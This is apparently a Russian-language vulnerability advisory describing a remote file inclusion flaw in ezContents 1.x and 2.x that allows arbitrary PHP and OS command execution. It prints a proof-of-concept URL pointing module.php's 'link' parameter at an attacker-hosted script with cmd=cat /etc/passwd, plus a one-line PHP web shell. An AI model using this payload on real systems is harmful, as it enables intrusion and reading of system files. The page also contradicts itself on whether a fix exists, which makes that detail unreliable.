Удаленное выполнение произвольного кода в ezContents

Дата публикации:
15.01.2004
Дата изменения:
17.10.2006
Всего просмотров:
831
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
ezContents 1.x
ezContents 2.x
Уязвимые версии: ezContents

Описание: Уязвимость обнаружена в ezContents. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целевой системе.

Сценарий module.php не фильтрует данные, представленные пользователем в переменной 'link':

http://[target]/module.php?link=http://[attacker]/index.php&cmd=cat /etc/passwd

----index.php----
<?
system($cmd);
?>
-----------------

URL производителя: http://www.ezcontents.org

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Remote Code Execution in ezContents

или введите имя

CAPTCHA